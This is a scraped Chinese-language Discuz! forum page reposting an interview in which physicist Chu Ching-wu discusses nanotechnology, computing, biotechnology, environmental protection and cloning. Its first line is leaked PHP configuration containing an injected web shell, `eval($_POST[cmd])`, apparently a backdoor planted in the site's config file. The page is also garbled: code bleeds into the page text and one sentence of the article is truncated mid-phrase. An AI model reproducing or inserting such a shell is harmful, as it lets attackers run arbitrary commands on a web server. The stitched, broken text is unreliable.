');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 納米技術、信息技術與生物技術 - 3C專區 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

納米技術、信息技術與生物技術

20世紀,科學技術在許多領域裡取得的輝煌成就,使人類社會發展到了今天這樣的水平。展望新世紀,生物技術、信息至將由此帶來一場世界性的重大變革。這是著名超導研究專家朱經武教授在人類邁入2000年之際對世界科技作出的評價。

  朱經武教授長期從事超導體,磁體和電解質研究,兼任美國許多國家實驗室的顧問,取得了卓越的成就,特別是在高溫超導研究方面取得了舉世公認的成果。不久前,在他執教的休斯頓大學,朱教授向記者暢談了未來科學技術的發展及其對人類的影響。

  朱教授說,微型化的發展已接近物理學極限,量子力學理論也有一定的極限,因此要依靠納米技術來解決未來的機器微型機問題,物理學領域一定要有新突破。一納米是十億分之一米,只是一個中等原子直徑的十幾倍。20多年前納米技術還只是夢想,現在已成世界各先進實驗室重大的研究課題和發達國家競相開發的項目。納米技術有可能迅速改變物質產品的生產方式,導致社會發生巨大變革。因此,西方國家競相投入巨資,以期在這一領域佔據主導地位。

  信息技術迅猛發展,對人們的生活和工作方式以及其它社會領域產生了衝擊性的影響。朱教授說,雖然目前計算機尚不具備人腦的兩大特點,即對問題進行平行處理和存在一個腦神經網絡,但是,在21世紀的前20年,科學家可能將研製出比人腦還聰明的計算機,計算機完全可以發展到與人類相互溝通的水平。

  在談到生物技術時,朱教授說,隨著科學技術的不斷進步,有關什麼是生命這個問題已很難簡單地加以回答,有機與無機的界限正在變得模糊起來。他舉例說,人工心臟和骨骼等的移植,已使人體具有了一些無機器官,將來,這類器官還會更多。

  在談到科學技術的進步與人類社會發展的相互關係時,朱教授說,隨著科學技術的發展,許多新問題會不斷被提出來,這樣就會有壓力和動力,促使人們設法去解決這些問題,科學技術也就隨之不斷進步。比如,網絡經濟不是預先創造出來的,而是隨著信息技術和因特網的發展而產生的。網絡商業的發展又會帶來一些新的預想不到的問題,從而推動科技不斷進步。在這個過程中,時而先有實踐,時而先有理論,實踐與理論互相依存,互相推動。

  朱教授還強調,人類必須大力保護自然環境。節約能源,開闢太陽能、海洋能、風能等再生能源以及核聚變能源。在談到克隆技術時朱教授說,克隆技術對人類有好處,但在實施該技術之前應考慮周全,因為它對人類社會的影響是深遠的。科學技術本身並沒有好壞之分,問題是人類怎樣開發和利用它。

  朱經武教授最後表示,青年是世界的未來,希望他們能夠取長補短,到艱苦的環境裡鍛煉自己,培養自己的奮鬥精神,將來為國家和社會作出貢獻。
返回列表